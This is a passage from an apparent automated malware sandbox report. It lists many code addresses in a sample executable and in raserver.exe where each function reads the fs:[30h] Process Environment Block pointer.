          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01977D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01993D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A03D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01968794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01998EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_019816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0198A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01988E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0195E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0197AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_01A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe Code function: 3_2_0196766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BC2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A61C mov eax, dword ptr fs:[00000030h]
